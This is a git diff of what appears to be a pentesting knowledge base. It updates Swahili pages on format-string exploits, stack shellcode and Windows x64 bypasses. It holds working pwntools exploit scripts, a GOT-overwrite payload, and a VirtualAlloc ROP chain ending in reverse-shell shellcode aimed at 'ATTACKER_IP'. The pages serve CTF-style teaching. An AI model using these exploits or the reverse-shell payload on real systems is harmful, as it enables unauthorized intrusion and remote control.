diff --git a/src/SUMMARY.md b/src/SUMMARY.md index ccaa8f2fe..e181a795f 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -234,6 +234,7 @@ - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md) - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md) - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md) + - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md) - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md) - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md) - [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md) diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 38fa792fe..d4e663919 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md 
@@ -3,15 +3,15 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Taarifa za Msingi -Katika C **`printf`** ni kazi inayoweza kutumika **kuchapisha** maandiko fulani. **Parameta ya kwanza** ambayo kazi hii inatarajia ni **maandishi halisi yenye waandishi wa muundo**. **Parameta zinazofuata** zinazotarajiwa ni **thamani** za **kuchukua nafasi** za **waandishi** kutoka kwa maandiko halisi. +Katika C **`printf`** ni funsi inayoweza kutumika **kuchapisha** kamba ya herufi. Parameta ya kwanza ambayo funsi hii inatarajia ni maandishi ghafi yenye **vibadilishi vya muundo**. Parameta zinazofuata ni thamani zitakazobadilisha **vibadilishi vya muundo** katika maandishi ghafi. -Kazi nyingine zenye udhaifu ni **`sprintf()`** na **`fprintf()`**. +Funsi nyingine zilizo na udhaifu ni **`sprintf()`** na **`fprintf()`**. -Udhaifu huu unatokea wakati **maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza** kwa kazi hii. Mshambuliaji ataweza kuunda **ingizo maalum linalotumia** uwezo wa **printf format** kusoma na **kuandika data yoyote katika anwani yoyote (inasomeka/inayoweza kuandikwa)**. Kwa njia hii, kuwa na uwezo wa **kutekeleza msimbo wowote**. +Udhaifu hujitokeza wakati maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza kwa funsi hii. Mshambuliaji ataweza kutengeneza ingizo maalum akitumia vibaya uwezo wa printf format string kusoma na kuandika data yoyote kwenye anwani yoyote (readable/writable). Kwa njia hii atakuwa na uwezo wa execute arbitrary code. -#### Formatters: +#### Vibadilishi: ```bash %08x —> 8 hex bytes %d —> Entire @@ -22,9 +22,9 @@ Udhaifu huu unatokea wakati **maandishi ya mshambuliaji yanapotumika kama hoja y %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` -**Mifano:** +**Mifano:** -- Mfano unaoweza kuathiriwa: +- Mfano dhaifu: ```c char buffer[30]; gets(buffer); // Dangerous: takes user input without restrictions. 
@@ -35,11 +35,11 @@ printf(buffer); // If buffer contains "%x", it reads from the stack. int value = 1205; printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5 ``` -- Pamoja na Hoja Zilizokosekana: +- Kwa Vigezo Vilivyokosekana: ```c printf("%x %x %x", value); // Unexpected output: reads random values from the stack. ``` -- fprintf inayoathiri: +- fprintf dhaifu: ```c #include 
@@ -52,28 +52,28 @@ fclose(output_file); return 0; } ``` -### **Kupata Viashiria** +### **Kupata Pointers** -Muundo **`%$x`**, ambapo `n` ni nambari, unaruhusu kuashiria kwa printf kuchagua parameter ya n (kutoka kwenye stack). Hivyo ikiwa unataka kusoma parameter ya 4 kutoka kwenye stack ukitumia printf unaweza kufanya: +Muundo **`%$x`**, ambapo `n` ni nambari, unaruhusu kuagiza printf ichague kigezo cha n (kutoka kwenye stack). Kwa hivyo, ikiwa unataka kusoma kigezo cha nne kutoka kwenye stack ukitumia printf unaweza kufanya: ```c printf("%x %x %x %x") ``` -na ungeweza kusoma kutoka kwa param ya kwanza hadi ya nne. +na ungeweza kusoma kutoka param ya kwanza hadi param ya nne. Au unaweza kufanya: ```c printf("%4$x") ``` -na kusoma moja kwa moja ya nne. +na soma moja kwa moja ya nne. -Kumbuka kwamba mshambuliaji anadhibiti `printf` **parameta, ambayo kimsingi inamaanisha kwamba** ingizo lake litakuwa kwenye stack wakati `printf` inaitwa, ambayo inamaanisha kwamba anaweza kuandika anwani maalum za kumbukumbu kwenye stack. +Kumbuka kwamba mshambuliaji anadhibiti `printf` **parameter, ambayo kwa msingi wake inamaanisha kwamba** ingizo lake litawekwa kwenye stack wakati `printf` itakapoitwa, ambayo inamaanisha anaweza kuandika specific memory addresses kwenye stack. > [!CAUTION] -> Mshambuliaji anayekontrol ingizo hili, ataweza **kuongeza anwani zisizo na mipaka kwenye stack na kufanya `printf` izifikie**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii. +> Mshambuliaji anayeudhibiti ingizo hili ataweza **add arbitrary address in the stack and make `printf` access them**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii. -## **Kusoma Bila Mpangilio** +## **Arbitrary Read** -Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ipate **anwani** iliyoko katika **n nafasi**, ikifuatia na **kuichapisha kana kwamba ni string** (chapisha hadi 0x00 ipatikane). 
Hivyo ikiwa anwani ya msingi ya binary ni **`0x8048000`**, na tunajua kwamba ingizo la mtumiaji linaanza katika nafasi ya 4 kwenye stack, inawezekana kuchapisha mwanzo wa binary kwa: +Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ichukue **address** iliyoko kwenye **n position**, kufuatilia na **kuiprint kama ingekuwa string** (kuprint hadi 0x00 inapopatikana). Kwa hiyo ikiwa base address ya binary ni **`0x8048000`**, na tunajua kwamba user input inaanza kwenye 4th position kwenye stack, inawezekana kuprint mwanzo wa binary kwa: ```python from pwn import * @@ -87,11 +87,11 @@ p.sendline(payload) log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||' ``` > [!CAUTION] -> Kumbuka kwamba huwezi kuweka anwani 0x8048000 mwanzoni mwa ingizo kwa sababu mfuatano utawekwa 0x00 mwishoni mwa anwani hiyo. +> Kumbuka huwezi kuweka anwani 0x8048000 mwanzoni mwa input kwa sababu string itakuwa cat katika 0x00 mwishoni mwa anwani hiyo. ### Tafuta offset -Ili kupata offset kwa ingizo lako unaweza kutuma bytes 4 au 8 (`0x41414141`) ikifuatiwa na **`%1$x`** na **kuongeza** thamani hadi upate `A's`. +Ili kupata offset kwa input yako, unaweza kutuma 4 au 8 bytes (`0x41414141`) ikifuatiwa na **`%1$x`** na **ongeza** thamani hadi utakapopata `A's`.
@@ -126,39 +126,40 @@ p.close() ```
-### Jinsi inavyofaa +### Ni muhimu vipi -Kusoma kwa bahati kunaweza kuwa na manufaa kwa: +Arbitrary reads zinaweza kuwa muhimu kwa: -- **Kutoa** **binary** kutoka kwenye kumbukumbu -- **Kufikia sehemu maalum za kumbukumbu ambapo** **info** **nyeti** imehifadhiwa (kama vile canaries, funguo za usimbuaji au nywila za kawaida kama katika hii [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) +- **Dump** the **binary** from memory +- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) -## **Kuandika kwa Bahati** +## **Arbitrary Write** -Formatter **`%$n`** **inaandika** **idadi ya bytes zilizandika** katika **anwani iliyoonyeshwa** katika param ya \ kwenye stack. Ikiwa mshambuliaji anaweza kuandika herufi nyingi kadri atakavyo kwa printf, atakuwa na uwezo wa kufanya **`%$n`** kuandika nambari isiyo ya kawaida katika anwani isiyo ya kawaida. +The formatter **`%$n`** **writes** the **number of written bytes** in the **indicated address** in the param in the stack. Ikiwa mshambuliaji anaweza kuandika herufi kwa wingi anayetaka kwa kutumia printf, ataweza kumfanya **`%$n`** iandike namba yoyote katika anuani yoyote. -Kwa bahati, ili kuandika nambari 9999, si lazima kuongeza 9999 "A"s kwenye ingizo, ili kufanya hivyo inawezekana kutumia formatter **`%.%$n`** kuandika nambari **``** katika **anwani inayotolewa na nafasi ya `num`**. +Kwa bahati nzuri, ili kuandika namba 9999, haitohitaji kuongeza "A" 9999 kwenye input; badala yake inawezekana kutumia formatter **`%.%$n`** kuandika namba **``** katika **anuani inayonyoshwa na nafasi ya `num`**. 
```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` -Hata hivyo, kumbuka kwamba kawaida ili kuandika anwani kama `0x08049724` (ambayo ni nambari KUBWA kuandika mara moja), **inatumika `$hn`** badala ya `$n`. Hii inaruhusu **kuandika tu Bytes 2**. Kwa hivyo operesheni hii inafanywa mara mbili, moja kwa ajili ya Bytes 2 za juu za anwani na nyingine kwa ajili ya zile za chini. +Hata hivyo, kumbuka kwamba kawaida ili kuandika anwani kama `0x08049724` (ambayo ni Nambari KUBWA kuandika kwa mara moja), **inatumika `$hn`** badala ya `$n`. Hii inawezesha **kuandika tu 2 Bytes**. Kwa hiyo operesheni hii hufanywa mara mbili, moja kwa 2B za juu za anwani na tena kwa zile za chini. -Kwa hivyo, udhaifu huu unaruhusu **kuandika chochote katika anwani yoyote (kuandika bila mpangilio).** +Kwa hivyo, uharibifu huu unawezesha **kuandika kitu chochote katika anwani yoyote (arbitrary write).** + +Katika mfano huu, lengo litakuwa **kuandika upya** **anwani** ya **function** katika jedwali la **GOT** ambayo itaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za arbitrary write to exec: -Katika mfano huu, lengo litakuwa **kuandika upya** **anwani** ya **kazi** katika jedwali la **GOT** ambalo litaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za kuandika bila mpangilio ili kutekeleza: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -Tuta **andika upya** **kazi** ambayo **inapokea** **hoja** zake kutoka kwa **mtumiaji** na **kuielekeza** kwa **`system`** **kazi**.\ -Kama ilivyotajwa, kuandika anwani, kawaida hatua 2 zinahitajika: Kwanza **unaandika Bytes 2** za anwani na kisha zile nyingine 2. Ili kufanya hivyo **`$hn`** inatumika. +Tutafanya **kuandika upya** **function** ambayo **inapokea** hoja zake kutoka kwa mtumiaji na kuielekeza kwa **`system`** **function**.\ +Kama ilivyotajwa, kuandika anwani kawaida kunahitaji hatua 2: Kwanza unaandika **2Bytes** za anwani kisha zile nyingine 2. 
Kufanya hivyo **`$hn`** inatumika. -- **HOB** inaitwa kwa Bytes 2 za juu za anwani -- **LOB** inaitwa kwa Bytes 2 za chini za anwani +- **HOB** inarejelewa kwa 2 bytes za juu za anwani +- **LOB** inarejelewa kwa 2 bytes za chini za anwani -Kisha, kwa sababu ya jinsi format string inavyofanya kazi unahitaji **kuandika kwanza ndogo** ya \[HOB, LOB] na kisha nyingine. +Kisha, kutokana na jinsi format string inavyofanya kazi lazima **uandike kwanza ndogo zaidi** ya [HOB, LOB] kisha nyingine. Ikiwa HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` @@ -170,16 +171,16 @@ HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB ```bash python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"' ``` -### Pwntools Template +### Pwntools Kiolezo -You can find a **template** to prepare a exploit for this kind of vulnerability in: +Unaweza kupata **kiolezo** cha kuandaa exploit kwa aina hii ya udhaifu katika: {{#ref}} format-strings-template.md {{#endref}} -Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): +Au mfano huu wa msingi kutoka [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): ```python from pwn import * 
@@ -200,18 +201,58 @@ p.interactive() ``` ## Format Strings to BOF -Inawezekana kutumia vitendo vya kuandika vya udhaifu wa format string ili **kuandika katika anwani za stack** na kutumia udhaifu wa aina ya **buffer overflow**. +Ni uwezekano kutumia vibaya vitendo vya kuandika vya format string vulnerability ili **kuandika kwenye anwani za stack** na kushambulia aina ya **buffer overflow**. -## Mifano Mingine & Marejeleo +## Windows x64: Format-string leak to bypass ASLR (no varargs) + +On Windows x64 vigezo vinne vya kwanza vya integer/pointer hupitishwa kwa registers: RCX, RDX, R8, R9. Katika call-sites nyingi zenye mdudu, attacker-controlled string hutumiwa kama format argument lakini hakuna variadic arguments zinazotolewa, kwa mfano: +```c +// keyData is fully controlled by the client +// _snprintf(dst, len, fmt, ...) +_snprintf(keyStringBuffer, 0xff2, (char*)keyData); +``` +Kwa sababu hakuna varargs zinazopelekwa, any conversion like "%p", "%x", "%s" itasababisha CRT kusoma the next variadic argument kutoka kwa rejista inayofaa. With the Microsoft x64 calling convention the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call-site will be printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by surrounding code or a callee-saved value), which can be used to recover the module base and defeat ASLR. + +Practical workflow: + +- Inject a harmless format such as "%p " at the very start of the attacker-controlled string so the first conversion executes before any filtering. +- Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as `leak - known_offset`. +- Reuse that base to compute absolute addresses for ROP gadgets and IAT entries remotely. 
+ +Example (abbreviated python): +```python +from pwn import remote + +# Send an input that the vulnerable code will pass as the "format" +fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-" # leading %p leaks R9 +io = remote(HOST, 4141) +# ... drive protocol to reach the vulnerable snprintf ... +leaked = int(io.recvline().split()[2], 16) # e.g. 0x7ff6693d0660 +base = leaked - 0x20660 # module base = leak - offset +print(hex(leaked), hex(base)) +``` +Vidokezo: +- Offset kamili ya kutoa hupatikana mara moja wakati wa local reversing kisha kutumika tena (same binary/version). +- Ikiwa "%p" haitachapisha pointer halali katika jaribio la kwanza, jaribu specifiers nyingine ("%llx", "%s") au conversions nyingi ("%p %p %p") ili kusampuli registers/stack za argument nyingine. +- Mfano huu ni maalum kwa Windows x64 calling convention na implementations za printf-family ambazo hunyakua varargs zisizo zipo kutoka registers wakati format string inazoziomba. + +Mbinu hii ni muhimu sana kuanzisha ROP kwenye Windows services zilizotengenezwa kwa ASLR na bila primitives wazi za memory disclosure. 
+ +## Mifano Nyingine & Marejeo - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string) - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4) - [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak) - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html) -- 32 bit, hakuna relro, hakuna canary, nx, hakuna pie, matumizi ya msingi ya format strings kuvuja bendera kutoka kwenye stack (hakuna haja ya kubadilisha mtiririko wa utekelezaji) +- 32 bit, no relro, no canary, nx, no pie, matumizi ya msingi ya format strings ku-leak flag kutoka stack (hakuna haja ya kubadilisha mtiririko wa utekelezaji) - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) -- 32 bit, relro, hakuna canary, nx, hakuna pie, format string kuandika anwani `fflush` na kazi ya win (ret2win) +- 32 bit, relro, no canary, nx, no pie, format string ili ku-overwrite address ya `fflush` na win function (ret2win) - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) -- 32 bit, relro, hakuna canary, nx, hakuna pie, format string kuandika anwani ndani ya main katika `.fini_array` (ili mtiririko urudi nyuma mara moja zaidi) na kuandika anwani kwa `system` katika jedwali la GOT ikielekeza kwa `strlen`. Wakati mtiririko unaporudi kwenye main, `strlen` inatekelezwa kwa pembejeo ya mtumiaji na ikielekeza kwa `system`, itatekeleza amri zilizopitishwa. 
+- 32 bit, relro, no canary, nx, no pie, format string ya kuandika address ndani ya main katika `.fini_array` (kwa hivyo flow inarudi tena mara 1) na kuandika address ya `system` kwenye GOT table ikielekeza kwa `strlen`. Wakati flow inaporudi main, `strlen` itatekelezwa na user input na ikiwa inamaanisha `system`, itatekeleza amri zilizopitishwa. + +## Marejeo + +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [x64 calling convention (MSVC)](https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index eeaf9c598..782ca077f 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md 
@@ -2,13 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Taarifa za Msingi -**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu iliyo hatarini na kisha kubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuelekeza kwenye eneo la shellcode hii, na kusababisha itekelezwe. Hii ni mbinu ya jadi inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zisizo na mipaka kwenye mfumo wa lengo. Hapa kuna muhtasari wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayolingana kwa kutumia Python na **pwntools**. +**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu dhaifu na kisha hubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuielekeza kwenye eneo la shellcode hiyo, na kusababisha itekelezwe. Hii ni njia ya klasik inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri za hiari kwenye mfumo wa lengo. Hapa kuna uchanganuzi wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayoendana ukitumia Python na **pwntools**. -### C Example: A Vulnerable Program +### Mfano wa C: Programu dhaifu -Let's start with a simple example of a vulnerable C program: +Tuanze na mfano rahisi wa programu dhaifu ya C: ```c #include #include 
@@ -24,22 +24,22 @@ printf("Returned safely\n"); return 0; } ``` -Programu hii ina udhaifu wa buffer overflow kutokana na matumizi ya kazi ya `gets()`. +Programu hii iko hatarini kwa buffer overflow kutokana na matumizi ya `gets()` function. -### Uundaji +### Kujenga -Ili kuunda programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo: +Ili kujenga programu hii huku ukizima ulinzi mbalimbali (to simulate a vulnerable environment), unaweza kutumia amri ifuatayo: ```sh gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c ``` -- `-fno-stack-protector`: Inazima ulinzi wa stack. -- `-z execstack`: Inafanya stack kuwa executable, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack. -- `-no-pie`: Inazima Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa. -- `-m32`: Inakusanya programu kama executable ya 32-bit, mara nyingi hutumiwa kwa urahisi katika maendeleo ya exploit. +- `-fno-stack-protector`: Inazima stack protection. +- `-z execstack`: Hufanya stack executable, jambo linalohitajika kwa kutekeleza shellcode iliyohifadhiwa kwenye stack. +- `-no-pie`: Inazima Position Independent Executable, na hivyo kurahisisha kutabiri memory address ambapo shellcode yetu itakuwa. +- `-m32`: Hucompile programu kama 32-bit executable, mara nyingi kutumika kwa urahisi katika exploit development. ### Python Exploit using Pwntools -Here's how you could write an exploit in Python using **pwntools** to perform a **ret2shellcode** attack: +Hapa kuna jinsi unavyoweza kuandika exploit kwa Python ukitumia **pwntools** ili kufanya shambulio la **ret2shellcode**: ```python from pwn import * 
@@ -66,26 +66,97 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide p.sendline(payload) p.interactive() ``` -Hii script inajenga payload inayojumuisha **NOP slide**, **shellcode**, na kisha inabadilisha **EIP** kwa anwani inayotaja NOP slide, kuhakikisha shellcode inatekelezwa. +This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed. -**NOP slide** (`asm('nop')`) inatumika kuongeza nafasi kwamba utekelezaji uta "slide" ndani ya shellcode yetu bila kujali anwani halisi. Badilisha hoja ya `p32()` kwa anwani ya mwanzo ya buffer yako pamoja na offset ili kuangukia kwenye NOP slide. +The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide. -## Ulinzi +## Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode) -- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **inapaswa kuzuiliwa** ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa sawa kila wakati na unahitaji kuwa na leak ili kubaini wapi kazi ya win imepakiwa. -- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) pia inapaswa kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe. -- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** ulinzi utazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka. +Kwenye Windows za kisasa stack sio executable (DEP/NX). 
Njia ya kawaida ya bado kuendesha stack-resident shellcode baada ya stack BOF ni kujenga mnyororo wa 64-bit ROP unaoitisha VirtualAlloc (au VirtualProtect) kutoka kwa module Import Address Table (IAT) ili kufanya eneo la stack liwe executable kisha kurudi katika shellcode iliyounganishwa baada ya mnyororo. -## Mifano Mingine & Marejeleo +Key points (Win64 calling convention): +- VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) +- RCX = lpAddress → chagua anwani kwenye stack ya sasa (e.g., RSP) ili eneo jipya lililotengwa la RWX ligongane na payload yako +- RDX = dwSize → kubwa vya kutosha kwa chain yako + shellcode (e.g., 0x1000) +- R8 = flAllocationType = MEM_COMMIT (0x1000) +- R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40) +- Return directly into the shellcode placed right after the chain. + +Minimal strategy: +1) Leak a module base (e.g., via a format-string, object pointer, etc.) to compute absolute gadget and IAT addresses under ASLR. +2) Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) and a call/jmp [VirtualAlloc@IAT]. If you lack direct pop r8/r9, use arithmetic gadgets to synthesize constants (e.g., set r8=0 and repeatedly add r9=0x40 forty times to reach 0x1000). +3) Place stage-2 shellcode immediately after the chain. + +Example layout (conceptual): +``` +# ... padding up to saved RIP ... 
+# R9 = 0x40 (PAGE_EXECUTE_READWRITE) +POP_R9_RET; 0x40 +# R8 = 0x1000 (MEM_COMMIT) — if no POP R8, derive via arithmetic +POP_R8_RET; 0x1000 +# RCX = &stack (lpAddress) +LEA_RCX_RSP_RET # or sequence: load RSP into a GPR then mov rcx, reg +# RDX = size (dwSize) +POP_RDX_RET; 0x1000 +# Call VirtualAlloc via the IAT +[IAT_VirtualAlloc] +# New RWX memory at RCX — execution continues at the next stack qword +JMP_SHELLCODE_OR_RET +# ---- stage-2 shellcode (x64) ---- +``` +Kwa seti ya gadgets iliyo na vikwazo, unaweza kutengeneza thamani za rejista kwa njia isiyo ya moja kwa moja, kwa mfano: +- mov r9, rbx; mov r8, 0; add rsp, 8; ret → iweke r9 kutoka rbx, ifanye r8 kuwa sifuri, na fidia stack kwa qword ya takataka. +- xor rbx, rsp; ret → weka rbx kuwa pointer ya stack ya sasa. +- push rbx; pop rax; mov rcx, rax; ret → hamisha thamani iliyotokana na RSP ndani ya RCX. + +Pwntools sketch (ikiwa base na gadgets vinajulikana): +```python +from pwn import * +base = 0x7ff6693b0000 +IAT_VirtualAlloc = base + 0x400000 # example: resolve via reversing +rop = b'' +# r9 = 0x40 +rop += p64(base+POP_RBX_RET) + p64(0x40) +rop += p64(base+MOV_R9_RBX_ZERO_R8_ADD_RSP_8_RET) + b'JUNKJUNK' +# rcx = rsp +rop += p64(base+POP_RBX_RET) + p64(0) +rop += p64(base+XOR_RBX_RSP_RET) +rop += p64(base+PUSH_RBX_POP_RAX_RET) +rop += p64(base+MOV_RCX_RAX_RET) +# r8 = 0x1000 via arithmetic if no pop r8 +for _ in range(0x1000//0x40): +rop += p64(base+ADD_R8_R9_ADD_RAX_R8_RET) +# rdx = 0x1000 (use any available gadget) +rop += p64(base+POP_RDX_RET) + p64(0x1000) +# call VirtualAlloc and land in shellcode +rop += p64(IAT_VirtualAlloc) +rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT)) +``` +Tips: +- VirtualProtect hufanya kazi kwa njia sawa ikiwa kufanya buffer iliyopo kuwa RX ni kipaumbele; mpangilio wa vigezo ni tofauti. +- Ikiwa nafasi ya stack ni nyembamba, tenga RWX mahali pengine (RCX=NULL) na jmp kwenye eneo jipya badala ya kutumia tena stack. 
+- Daima zingatia gadgets zinazorudisha RSP (e.g., add rsp, 8; ret) kwa kuingiza junk qwords. + +- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **inapaswa kuzimwa** ili anwani iwe ya kuaminika kwa utekelezaji tofauti; vinginevyo anwani ambapo function itahifadhiwa haitakuwa ile ile kila wakati na utahitaji leak ili kugundua wapi win function imepakiwa. +- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) **inapaswa pia kuzimwa** au anwani ya kurudi ya EIP itakayodhulumiwa haitawahi kutumika. +- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** ulinzi utaizuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitaweza kutekelezwa. + +## Mifano na Marejeo - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode) - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html) -- 64bit, ASLR na leak ya anwani ya stack, andika shellcode na ruka kwake +- 64bit, ASLR na stack address leak, andika shellcode na ruka kwenye hiyo - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html) -- 32 bit, ASLR na leak ya stack, andika shellcode na ruka kwake +- 32 bit, ASLR na stack leak, andika shellcode na ruka kwenye hiyo - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html) -- 32 bit, ASLR na leak ya stack, kulinganisha kuzuia wito wa exit(), badilisha variable kwa thamani na andika shellcode na ruka kwake +- 32 bit, ASLR na stack leak, kulinganisha ili kuzuia wito la exit(), funika variable na thamani, andika shellcode na ruka kwenye hiyo - 
[https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/) -- arm64, hakuna ASLR, ROP gadget kufanya stack iwe ya kutekelezeka na ruka kwa shellcode ndani ya stack +- arm64, hakuna ASLR, ROP gadget kufanya stack iwe executable na ruka kwa shellcode iliyoko kwenye stack + + +## Marejeo + +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [VirtualAlloc documentation](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index a1a8db472..1bde7449f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +### **Chombo bora cha kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) -## Initial Windows Theory +## Nadharia ya Mwanzo ya Windows ### Access Tokens -**Ikiwa hujui ni nini Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** +**Kama haufahamu Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} 
